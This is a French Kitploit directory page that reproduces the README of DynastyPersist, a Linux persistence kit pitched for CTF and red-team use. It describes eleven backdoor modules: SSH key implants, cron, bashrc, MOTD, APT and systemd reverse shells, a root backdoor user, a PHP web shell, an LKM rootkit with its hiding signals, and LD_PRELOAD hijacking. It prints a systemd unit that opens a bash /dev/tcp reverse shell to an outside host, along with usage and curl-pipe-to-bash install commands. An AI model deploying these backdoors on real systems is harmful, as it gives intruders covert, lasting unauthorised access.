Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
DynastyPersist — Kit de persistance Linux avec 11 modules pour backdoors SSH, cronjobs, services systemd, rootkits LKM et escalade de privilèges via LD_PRELOAD. Conçu pour les compétitions CTF et les opérations d'équipe rouge. | Kitploit
Outils/GitHubGitHub/trevohack/dynastypersist
Escalade de PrivilègesMécanismes de PersistancePost-ExploitationCTFTests d'IntrusionRed Teaming
GitHubtrevohack/dynastypersist

DynastyPersist

Kit de persistance Linux avec 11 modules pour backdoors SSH, cronjobs, services systemd, rootkits LKM et escalade de privilèges via LD_PRELOAD. Conçu pour les compétitions CTF et les opérations d'équipe rouge.

Voir le dépôt
16221il y a 11 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

DynastyPersist 1.5

DynastyPersist : un outil rationalisé pour obtenir une persistance Linux sans effort.
Supporte KoTH, Battlegrounds et Pentest Operations

GitHub License GitHub Repo stars Static Badge

Installation • Documentation • Utilisation

image

Documentation

[ FONCTIONNALITÉS ]

[ MODULES ]

Génération de clé SSH

  • Obtenez un accès à un serveur en utilisant la génération de clé ssh. Ce module crée une clé id_rsa pour chaque utilisateur. Elle peut être utilisée pour un accès inversé. Après avoir exécuté ce module, l'attaquant peut se connecter au serveur via ssh.

  • Cela peut être fait manuellement avec la commande ssh-keygen. Cependant, le module crée une clé privée pour chaque utilisateur en un rien de temps.

root@kitploit:~
root@kali ~ ssh -i id_rsa [email protected]
  • Numéro du module : 1

Persistance via Cronjob

  • Les cronjobs sous Linux sont des tâches planifiées qui s'exécutent automatiquement à intervalles réguliers.

  • L'un des modules les plus efficaces, impliquant des shells inversés. Ce module écrit directement des commandes de shell inversé dans /etc/crontab. Cela ouvrira un shell sur le port que vous écoutez.

root@kitploit:~
root@kali ~ nc -nvlp 9999
  • Numéro du module : 2

Utilisateur personnalisé avec droits root

  • Une méthode simple et rapide pour obtenir un accès inversé. Ce module crée simplement un autre utilisateur avec accès root. Ensuite, l'attaquant peut se connecter à cet utilisateur via ssh.
root@kitploit:~
root@kali ~ ssh [email protected]
  • Numéro du module : 3

Persistance par exécution de code à distance

  • Ce module est fourni avec un script php hébergé dans le répertoire racine web. Le script se trouve dans /var/www/html/dynasty_rce/rce.php. De plus, le préfixe dynasty_rce peut être masqué si le module LKM est exécuté au préalable.

  • Visiter victim_ip:port/dynasty_rce/rce.php vous donnera la possibilité d'exécuter des commandes dans le shell.

  • Numéro du module : 4

Rootkit LKM

  • Une méthode de persistance avancée qui implante un rootkit dans le noyau du serveur. Le programme se concentre sur un rootkit LKM open-source appelé Diamorphine. Le module se trouve dans /var/tmp/.memory comme emplacement temporaire. Ce répertoire est supprimé après la mise en place du module.
  • Le bloc de code ci-dessous montre les utilisations de ce module.
root@kitploit:~
victim@ubuntu ~ kill -64 0 # Promtes to root user. 
victim@ubuntu ~ mkdir dynasty_persist # Any directory starting with dynasty will be hidden.
victim@ubuntu ~ kill -31 <process> # Hides processors
victim@ubuntu ~ lsmod | grep -i diamorphine # Hides itself 
victim@ubuntu ~ kill -63 0 # Make it appear in lsmod output
  • Numéro du module : 5

Persistance via Bashrc

  • Ce module écrit des commandes de shell inversé, des alias et des variables pour un accès inversé. Un shell est offert lorsqu'un utilisateur se connecte au serveur ou lorsque la personne utilise find ou cat.
root@kitploit:~
root@kali ~ nc -nvlp 9999
  • Numéro du module : 6

Service Systemd pour root

  • Un module qui crée un service personnalisé dans systemd pour un accès inversé.

  • Un exemple :

root@kitploit:~
Description=Dynasty Persist

[Service]
ExecStart=sudo bash /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.3/9999 0>&1'
Restart=always
RestartSec=30

[Install]
WantedBy=default.target"
  • L'exemple ci-dessus sera créé en tant que service. Cette méthode est efficace et durable.

  • Numéro du module : 7

Configuration d'escalade de privilèges LD_PRELOAD

  • LD_PRELOAD est une variable d'environnement sous Linux qui permet aux utilisateurs de précharger une bibliothèque partagée avant d'autres bibliothèques. L'escalade de privilèges via LD_PRELOAD implique le chargement d'une bibliothèque malveillante pour intercepter et modifier les appels système, permettant potentiellement d'obtenir des privilèges élevés. Le module backdoor des commandes comme find et wget.

  • Numéro du module : 8

Backdoor dans Message du jour / En-tête

  • Le « Message du jour » (MOTD) sous Linux est un texte personnalisable affiché aux utilisateurs lors de la connexion, fournissant des informations ou des mises à jour sur le système. Il est généralement stocké dans le fichier /etc/motd et peut être modifié par les administrateurs système.

  • Ce module écrit un shell dans /etc/update-motd.d/00-header. Cela est généralement déclenché lorsqu'un utilisateur se connecte.

  • Numéro du module : 9

Modifier un service Systemd existant

  • Similaire au module 7, celui-ci modifie un service existant pour un accès inversé.

  • Simplement, il réécrit le ExecStartPre dans le service en une commande de shell inversé.

  • Numéro du module : 10

Backdoor dans APT

  • « APT » signifie Advanced Package Tool, et il est couramment utilisé dans les systèmes basés sur Debian comme Ubuntu. Le fichier se trouvera ici : /etc/apt/apt.conf.d/42backdoor

  • Backdoor la commande apt, chaque fois que apt est exécuté, un shell s'ouvre.

  • Numéro du module : 11

[ MODES ]

  • Actuellement, 2 modes sont disponibles dans la dernière mise à jour (1.4).

  • Les modes sont console et ctf, conçus pour fonctionner avec un comportement spécifique.

  • En comparaison, le mode console offre plus de fonctionnalités et de stabilité que le mode ctf.

Console

  • Le mode console lance l'outil dans sa configuration habituelle, avec toutes les fonctionnalités. Ces fonctionnalités s'exécutent localement sur l'hôte local où le script est exécuté. Conçu pour une persistance dans les opérations en temps réel.

  • Le préfixe use suivi du numéro du module sera utilisé pour exécuter n'importe quel module sélectionné. Par exemple, use 1

  • De plus, l'interface est mise à jour : les modules/payloads sont désormais visibles lorsque vous tapez show payloads.

  • Enfin, le menu d'aide/options est également modifié ; entrez show options pour le visualiser.

CTF

  • Le mode ctf est une fonctionnalité supplémentaire pour se connecter à un serveur compromis via SSH et obtenir une persistance. Ce module complémentaire aidera beaucoup dans KoTH ou Battlegrounds. De plus, cela fera gagner beaucoup de temps consacré à la mise en place de la persistance.

  • Exécute la plupart des fonctions de console.

[ UTILISATION ]

  • La syntaxe pour utiliser l'outil est décrite ci-dessous :
root@kitploit:~
$ ./dynasty.sh <lhost> <lport> <mode> 
$ ./dynasty.sh ctf 
$ ./dynasty.sh 10.10.14.3 9999 console 

Installation

Via Git

root@kitploit:~
$ git clone https://github.com/Trevohack/DynastyPersist
$ cd DynastyPersist/src 

Via Curl

root@kitploit:~
$ curl -sSL https://raw.githubusercontent.com/Trevohack/DynastyPersist/main/src/dynasty.sh | bash

Merci !

Télécharger l’outil
FonctionnalitésDescription
Génération de clé SSHGénère automatiquement des clés SSH pour un accès discret.
Persistance via CronjobMet en place des cronjobs pour une persistance planifiée.
Utilisateur personnalisé avec droits rootCrée un utilisateur personnalisé avec privilèges root.
Persistance par exécution de code à distanceObtient une persistance via l'exécution de code à distance.
Rootkit LKMDémontre une persistance par rootkit basé sur un module noyau Linux (LKM).
Persistance via BashrcModifie les fichiers d'initialisation du shell de l'utilisateur pour persistance (alias / shells inversés).
Service Systemd pour rootMet en place un service systemd pour obtenir une persistance root.
Configuration d'escalade de privilèges LD_PRELOADConfigure LD_PRELOAD pour l'escalade de privilèges.
Backdoor dans Message du jour / En-têteBackdoor l'affichage du message système pour un accès discret.
Modifier un service Systemd existantManipule un service systemd existant pour persistance.
Backdoor dans la commande APTBackdoor la commande apt pour faire apparaître un shell.